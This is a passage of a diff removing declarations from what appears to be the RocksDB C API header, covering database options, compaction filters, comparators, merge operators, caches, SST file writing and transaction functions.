-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_table_cache_remove_scan_count_limit(rocksdb_options_t*,
-                                                        int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_arena_block_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_use_fsync(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_log_dir(
-    rocksdb_options_t*, const char*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_wal_dir(rocksdb_options_t*,
-                                                            const char*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_WAL_ttl_seconds(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_WAL_size_limit_MB(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_manifest_preallocation_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t*,
-                                                    unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_allow_mmap_reads(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_allow_mmap_writes(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_use_direct_reads(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_use_direct_io_for_flush_and_compaction(rocksdb_options_t*,
-                                                           unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_is_fd_close_on_exec(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_skip_log_error_on_recovery(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_stats_dump_period_sec(
-    rocksdb_options_t*, unsigned int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_advise_random_on_open(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_access_hint_on_compaction_start(rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_use_adaptive_mutex(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_bytes_per_sync(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_allow_concurrent_memtable_write(rocksdb_options_t*,
-                                                    unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_enable_write_thread_adaptive_yield(rocksdb_options_t*,
-                                                       unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_sequential_skip_in_iterations(rocksdb_options_t*,
-                                                      uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_disable_auto_compactions(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_optimize_filters_for_hits(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_delete_obsolete_files_period_micros(rocksdb_options_t*,
-                                                        uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_prepare_for_bulk_load(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_memtable_vector_rep(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_memtable_prefix_bloom_size_ratio(
-    rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_compaction_bytes(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hash_skip_list_rep(
-    rocksdb_options_t*, size_t, int32_t, int32_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hash_link_list_rep(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_plain_table_factory(
-    rocksdb_options_t*, uint32_t, int, double, size_t);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_min_level_to_compress(
-    rocksdb_options_t* opt, int level);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_memtable_huge_page_size(
-    rocksdb_options_t*, size_t);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_successive_merges(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_bloom_locality(
-    rocksdb_options_t*, uint32_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_inplace_update_support(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_inplace_update_num_locks(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_report_bg_io_stats(
-    rocksdb_options_t*, int);
-
-enum {
-  rocksdb_tolerate_corrupted_tail_records_recovery = 0,
-  rocksdb_absolute_consistency_recovery = 1,
-  rocksdb_point_in_time_recovery = 2,
-  rocksdb_skip_any_corrupted_records_recovery = 3
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_wal_recovery_mode(
-    rocksdb_options_t*, int);
-
-enum {
-  rocksdb_no_compression = 0,
-  rocksdb_snappy_compression = 1,
-  rocksdb_zlib_compression = 2,
-  rocksdb_bz2_compression = 3,
-  rocksdb_lz4_compression = 4,
-  rocksdb_lz4hc_compression = 5,
-  rocksdb_xpress_compression = 6,
-  rocksdb_zstd_compression = 7
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compression(
-    rocksdb_options_t*, int);
-
-enum {
-  rocksdb_level_compaction = 0,
-  rocksdb_universal_compaction = 1,
-  rocksdb_fifo_compaction = 2
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compaction_style(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_universal_compaction_options(
-    rocksdb_options_t*, rocksdb_universal_compaction_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_fifo_compaction_options(
-    rocksdb_options_t* opt, rocksdb_fifo_compaction_options_t* fifo);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_ratelimiter(
-    rocksdb_options_t* opt, rocksdb_ratelimiter_t* limiter);
-
-/* RateLimiter */
-extern ROCKSDB_LIBRARY_API rocksdb_ratelimiter_t* rocksdb_ratelimiter_create(
-    int64_t rate_bytes_per_sec, int64_t refill_period_us, int32_t fairness);
-extern ROCKSDB_LIBRARY_API void rocksdb_ratelimiter_destroy(rocksdb_ratelimiter_t*);
-
-/* Compaction Filter */
-
-extern ROCKSDB_LIBRARY_API rocksdb_compactionfilter_t*
-rocksdb_compactionfilter_create(
-    void* state, void (*destructor)(void*),
-    unsigned char (*filter)(void*, int level, const char* key,
-                            size_t key_length, const char* existing_value,
-                            size_t value_length, char** new_value,
-                            size_t* new_value_length,
-                            unsigned char* value_changed),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_compactionfilter_set_ignore_snapshots(
-    rocksdb_compactionfilter_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_compactionfilter_destroy(
-    rocksdb_compactionfilter_t*);
-
-/* Compaction Filter Context */
-
-extern ROCKSDB_LIBRARY_API unsigned char
-rocksdb_compactionfiltercontext_is_full_compaction(
-    rocksdb_compactionfiltercontext_t* context);
-
-extern ROCKSDB_LIBRARY_API unsigned char
-rocksdb_compactionfiltercontext_is_manual_compaction(
-    rocksdb_compactionfiltercontext_t* context);
-
-/* Compaction Filter Factory */
-
-extern ROCKSDB_LIBRARY_API rocksdb_compactionfilterfactory_t*
-rocksdb_compactionfilterfactory_create(
-    void* state, void (*destructor)(void*),
-    rocksdb_compactionfilter_t* (*create_compaction_filter)(
-        void*, rocksdb_compactionfiltercontext_t* context),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_compactionfilterfactory_destroy(
-    rocksdb_compactionfilterfactory_t*);
-
-/* Comparator */
-
-extern ROCKSDB_LIBRARY_API rocksdb_comparator_t* rocksdb_comparator_create(
-    void* state, void (*destructor)(void*),
-    int (*compare)(void*, const char* a, size_t alen, const char* b,
-                   size_t blen),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_comparator_destroy(
-    rocksdb_comparator_t*);
-
-/* Filter policy */
-
-extern ROCKSDB_LIBRARY_API rocksdb_filterpolicy_t* rocksdb_filterpolicy_create(
-    void* state, void (*destructor)(void*),
-    char* (*create_filter)(void*, const char* const* key_array,
-                           const size_t* key_length_array, int num_keys,
-                           size_t* filter_length),
-    unsigned char (*key_may_match)(void*, const char* key, size_t length,
-                                   const char* filter, size_t filter_length),
-    void (*delete_filter)(void*, const char* filter, size_t filter_length),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_filterpolicy_destroy(
-    rocksdb_filterpolicy_t*);
-
-extern ROCKSDB_LIBRARY_API rocksdb_filterpolicy_t*
-rocksdb_filterpolicy_create_bloom(int bits_per_key);
-extern ROCKSDB_LIBRARY_API rocksdb_filterpolicy_t*
-rocksdb_filterpolicy_create_bloom_full(int bits_per_key);
-
-/* Merge Operator */
-
-extern ROCKSDB_LIBRARY_API rocksdb_mergeoperator_t*
-rocksdb_mergeoperator_create(
-    void* state, void (*destructor)(void*),
-    char* (*full_merge)(void*, const char* key, size_t key_length,
-                        const char* existing_value,
-                        size_t existing_value_length,
-                        const char* const* operands_list,
-                        const size_t* operands_list_length, int num_operands,
-                        unsigned char* success, size_t* new_value_length),
-    char* (*partial_merge)(void*, const char* key, size_t key_length,
-                           const char* const* operands_list,
-                           const size_t* operands_list_length, int num_operands,
-                           unsigned char* success, size_t* new_value_length),
-    void (*delete_value)(void*, const char* value, size_t value_length),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API void rocksdb_mergeoperator_destroy(
-    rocksdb_mergeoperator_t*);
-
-/* Read options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_readoptions_t* rocksdb_readoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_destroy(
-    rocksdb_readoptions_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_verify_checksums(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_fill_cache(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_snapshot(
-    rocksdb_readoptions_t*, const rocksdb_snapshot_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_iterate_upper_bound(
-    rocksdb_readoptions_t*, const char* key, size_t keylen);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_read_tier(
-    rocksdb_readoptions_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_tailing(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_readahead_size(
-    rocksdb_readoptions_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_pin_data(
-    rocksdb_readoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_readoptions_set_total_order_seek(
-    rocksdb_readoptions_t*, unsigned char);
-
-/* Write options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_writeoptions_t*
-rocksdb_writeoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_writeoptions_destroy(
-    rocksdb_writeoptions_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writeoptions_set_sync(
-    rocksdb_writeoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_writeoptions_disable_WAL(
-    rocksdb_writeoptions_t* opt, int disable);
-
-/* Compact range options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_compactoptions_t*
-rocksdb_compactoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_compactoptions_destroy(
-    rocksdb_compactoptions_t*);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_compactoptions_set_exclusive_manual_compaction(
-    rocksdb_compactoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_compactoptions_set_change_level(
-    rocksdb_compactoptions_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_compactoptions_set_target_level(
-    rocksdb_compactoptions_t*, int);
-
-/* Flush options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_flushoptions_t*
-rocksdb_flushoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_flushoptions_destroy(
-    rocksdb_flushoptions_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_flushoptions_set_wait(
-    rocksdb_flushoptions_t*, unsigned char);
-
-/* Cache */
-
-extern ROCKSDB_LIBRARY_API rocksdb_cache_t* rocksdb_cache_create_lru(
-    size_t capacity);
-extern ROCKSDB_LIBRARY_API void rocksdb_cache_destroy(rocksdb_cache_t* cache);
-extern ROCKSDB_LIBRARY_API void rocksdb_cache_set_capacity(
-    rocksdb_cache_t* cache, size_t capacity);
-extern ROCKSDB_LIBRARY_API size_t
-rocksdb_cache_get_usage(rocksdb_cache_t* cache);
-extern ROCKSDB_LIBRARY_API size_t
-rocksdb_cache_get_pinned_usage(rocksdb_cache_t* cache);
-
-/* DBPath */
-
-extern ROCKSDB_LIBRARY_API rocksdb_dbpath_t* rocksdb_dbpath_create(const char* path, uint64_t target_size);
-extern ROCKSDB_LIBRARY_API void rocksdb_dbpath_destroy(rocksdb_dbpath_t*);
-
-/* Env */
-
-extern ROCKSDB_LIBRARY_API rocksdb_env_t* rocksdb_create_default_env();
-extern ROCKSDB_LIBRARY_API rocksdb_env_t* rocksdb_create_mem_env();
-extern ROCKSDB_LIBRARY_API void rocksdb_env_set_background_threads(
-    rocksdb_env_t* env, int n);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_env_set_high_priority_background_threads(rocksdb_env_t* env, int n);
-extern ROCKSDB_LIBRARY_API void rocksdb_env_join_all_threads(
-    rocksdb_env_t* env);
-extern ROCKSDB_LIBRARY_API void rocksdb_env_destroy(rocksdb_env_t*);
-
-extern ROCKSDB_LIBRARY_API rocksdb_envoptions_t* rocksdb_envoptions_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_envoptions_destroy(
-    rocksdb_envoptions_t* opt);
-
-/* SstFile */
-
-extern ROCKSDB_LIBRARY_API rocksdb_sstfilewriter_t*
-rocksdb_sstfilewriter_create(const rocksdb_envoptions_t* env,
-                             const rocksdb_options_t* io_options);
-extern ROCKSDB_LIBRARY_API rocksdb_sstfilewriter_t*
-rocksdb_sstfilewriter_create_with_comparator(
-    const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options,
-    const rocksdb_comparator_t* comparator);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_open(
-    rocksdb_sstfilewriter_t* writer, const char* name, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_add(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    const char* val, size_t vallen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_put(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    const char* val, size_t vallen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_merge(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    const char* val, size_t vallen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_delete(
-    rocksdb_sstfilewriter_t* writer, const char* key, size_t keylen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_finish(
-    rocksdb_sstfilewriter_t* writer, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_sstfilewriter_destroy(
-    rocksdb_sstfilewriter_t* writer);
-
-extern ROCKSDB_LIBRARY_API rocksdb_ingestexternalfileoptions_t*
-rocksdb_ingestexternalfileoptions_create();
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_move_files(
-    rocksdb_ingestexternalfileoptions_t* opt, unsigned char move_files);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_snapshot_consistency(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char snapshot_consistency);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_allow_global_seqno(
-    rocksdb_ingestexternalfileoptions_t* opt, unsigned char allow_global_seqno);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_ingestexternalfileoptions_set_allow_blocking_flush(
-    rocksdb_ingestexternalfileoptions_t* opt,
-    unsigned char allow_blocking_flush);
-extern ROCKSDB_LIBRARY_API void rocksdb_ingestexternalfileoptions_destroy(
-    rocksdb_ingestexternalfileoptions_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_ingest_external_file(
-    rocksdb_t* db, const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_ingest_external_file_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* handle,
-    const char* const* file_list, const size_t list_len,
-    const rocksdb_ingestexternalfileoptions_t* opt, char** errptr);
-
-/* SliceTransform */
-
-extern ROCKSDB_LIBRARY_API rocksdb_slicetransform_t*
-rocksdb_slicetransform_create(
-    void* state, void (*destructor)(void*),
-    char* (*transform)(void*, const char* key, size_t length,
-                       size_t* dst_length),
-    unsigned char (*in_domain)(void*, const char* key, size_t length),
-    unsigned char (*in_range)(void*, const char* key, size_t length),
-    const char* (*name)(void*));
-extern ROCKSDB_LIBRARY_API rocksdb_slicetransform_t*
-    rocksdb_slicetransform_create_fixed_prefix(size_t);
-extern ROCKSDB_LIBRARY_API rocksdb_slicetransform_t*
-rocksdb_slicetransform_create_noop();
-extern ROCKSDB_LIBRARY_API void rocksdb_slicetransform_destroy(
-    rocksdb_slicetransform_t*);
-
-/* Universal Compaction options */
-
-enum {
-  rocksdb_similar_size_compaction_stop_style = 0,
-  rocksdb_total_size_compaction_stop_style = 1
-};
-
-extern ROCKSDB_LIBRARY_API rocksdb_universal_compaction_options_t*
-rocksdb_universal_compaction_options_create();
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_size_ratio(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_min_merge_width(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_max_merge_width(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_max_size_amplification_percent(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_compression_size_percent(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_universal_compaction_options_set_stop_style(
-    rocksdb_universal_compaction_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_universal_compaction_options_destroy(
-    rocksdb_universal_compaction_options_t*);
-
-extern ROCKSDB_LIBRARY_API rocksdb_fifo_compaction_options_t*
-rocksdb_fifo_compaction_options_create();
-extern ROCKSDB_LIBRARY_API void
-rocksdb_fifo_compaction_options_set_max_table_files_size(
-    rocksdb_fifo_compaction_options_t* fifo_opts, uint64_t size);
-extern ROCKSDB_LIBRARY_API void rocksdb_fifo_compaction_options_destroy(
-    rocksdb_fifo_compaction_options_t* fifo_opts);
-
-extern ROCKSDB_LIBRARY_API int rocksdb_livefiles_count(
-    const rocksdb_livefiles_t*);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_livefiles_name(
-    const rocksdb_livefiles_t*, int index);
-extern ROCKSDB_LIBRARY_API int rocksdb_livefiles_level(
-    const rocksdb_livefiles_t*, int index);
-extern ROCKSDB_LIBRARY_API size_t
-rocksdb_livefiles_size(const rocksdb_livefiles_t*, int index);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_livefiles_smallestkey(
-    const rocksdb_livefiles_t*, int index, size_t* size);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_livefiles_largestkey(
-    const rocksdb_livefiles_t*, int index, size_t* size);
-extern ROCKSDB_LIBRARY_API void rocksdb_livefiles_destroy(
-    const rocksdb_livefiles_t*);
-
-/* Utility Helpers */
-
-extern ROCKSDB_LIBRARY_API void rocksdb_get_options_from_string(
-    const rocksdb_options_t* base_options, const char* opts_str,
-    rocksdb_options_t* new_options, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_file_in_range(
-    rocksdb_t* db, const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_file_in_range_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* limit_key,
-    size_t limit_key_len, char** errptr);
-
-/* Transactions */
-
-extern ROCKSDB_LIBRARY_API rocksdb_column_family_handle_t*
-rocksdb_transactiondb_create_column_family(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_options_t* column_family_options,
-    const char* column_family_name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_t* rocksdb_transactiondb_open(
-    const rocksdb_options_t* options,
-    const rocksdb_transactiondb_options_t* txn_db_options, const char* name,
-    char** errptr);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t*
-rocksdb_transactiondb_create_snapshot(rocksdb_transactiondb_t* txn_db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_release_snapshot(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_snapshot_t* snapshot);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transaction_t* rocksdb_transaction_begin(
-    rocksdb_transactiondb_t* txn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_transaction_options_t* txn_options,
-    rocksdb_transaction_t* old_txn);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_commit(
-    rocksdb_transaction_t* txn, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_rollback(
-    rocksdb_transaction_t* txn, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_destroy(
-    rocksdb_transaction_t* txn);
-
-// This snapshot should be freed using rocksdb_free
-extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t*
-rocksdb_transaction_get_snapshot(rocksdb_transaction_t* txn);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options,
-    const char* key, size_t klen, size_t* vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_cf(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key, size_t klen,
-    size_t* vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_for_update(
-    rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options,
-    const char* key, size_t klen, size_t* vlen, unsigned char exclusive,
-    char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options,
-    const char* key, size_t klen, size_t* vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, size_t* vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put(
-    rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val,
-    size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put_cf(
-    rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    const char* key, size_t klen, const char* val, size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_t *batch, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_merge(
-    rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val,
-    size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_merge(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    const char* key, size_t klen, const char* val, size_t vlen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete(
-    rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete_cf(
-    rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    const char* key, size_t klen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete_cf(
-    rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t*
-rocksdb_transaction_create_iterator(rocksdb_transaction_t* txn,
-                                    const rocksdb_readoptions_t* options);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t*
-rocksdb_transactiondb_create_iterator(rocksdb_transactiondb_t* txn_db,
-                                      const rocksdb_readoptions_t* options);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_close(
-    rocksdb_transactiondb_t* txn_db);
-
-extern ROCKSDB_LIBRARY_API rocksdb_checkpoint_t*
-rocksdb_transactiondb_checkpoint_object_create(rocksdb_transactiondb_t* txn_db,
-                                               char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_optimistictransactiondb_t*
-rocksdb_optimistictransactiondb_open(const rocksdb_options_t* options,
-                                     const char* name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transaction_t*
-rocksdb_optimistictransaction_begin(
-    rocksdb_optimistictransactiondb_t* otxn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_optimistictransaction_options_t* otxn_options,
-    rocksdb_transaction_t* old_txn);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransactiondb_close(
-    rocksdb_optimistictransactiondb_t* otxn_db);
-
-/* Transaction Options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_options_t*
-rocksdb_transactiondb_options_create();
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_options_destroy(
-    rocksdb_transactiondb_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_options_set_max_num_locks(
-    rocksdb_transactiondb_options_t* opt, int64_t max_num_locks);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_options_set_num_stripes(
-    rocksdb_transactiondb_options_t* opt, size_t num_stripes);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transactiondb_options_set_transaction_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t txn_lock_timeout);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transactiondb_options_set_default_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t default_lock_timeout);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transaction_options_t*
-rocksdb_transaction_options_create();
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_destroy(
-    rocksdb_transaction_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_set_snapshot(
-    rocksdb_transaction_options_t* opt, unsigned char v);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_deadlock_detect(
-    rocksdb_transaction_options_t* opt, unsigned char v);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_lock_timeout(
-    rocksdb_transaction_options_t* opt, int64_t lock_timeout);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_expiration(
-    rocksdb_transaction_options_t* opt, int64_t expiration);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transaction_options_set_deadlock_detect_depth(
-    rocksdb_transaction_options_t* opt, int64_t depth);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transaction_options_set_max_write_batch_size(
-    rocksdb_transaction_options_t* opt, size_t size);
-
-
-extern ROCKSDB_LIBRARY_API rocksdb_optimistictransaction_options_t*
-rocksdb_optimistictransaction_options_create();
-
-extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransaction_options_destroy(
-    rocksdb_optimistictransaction_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void
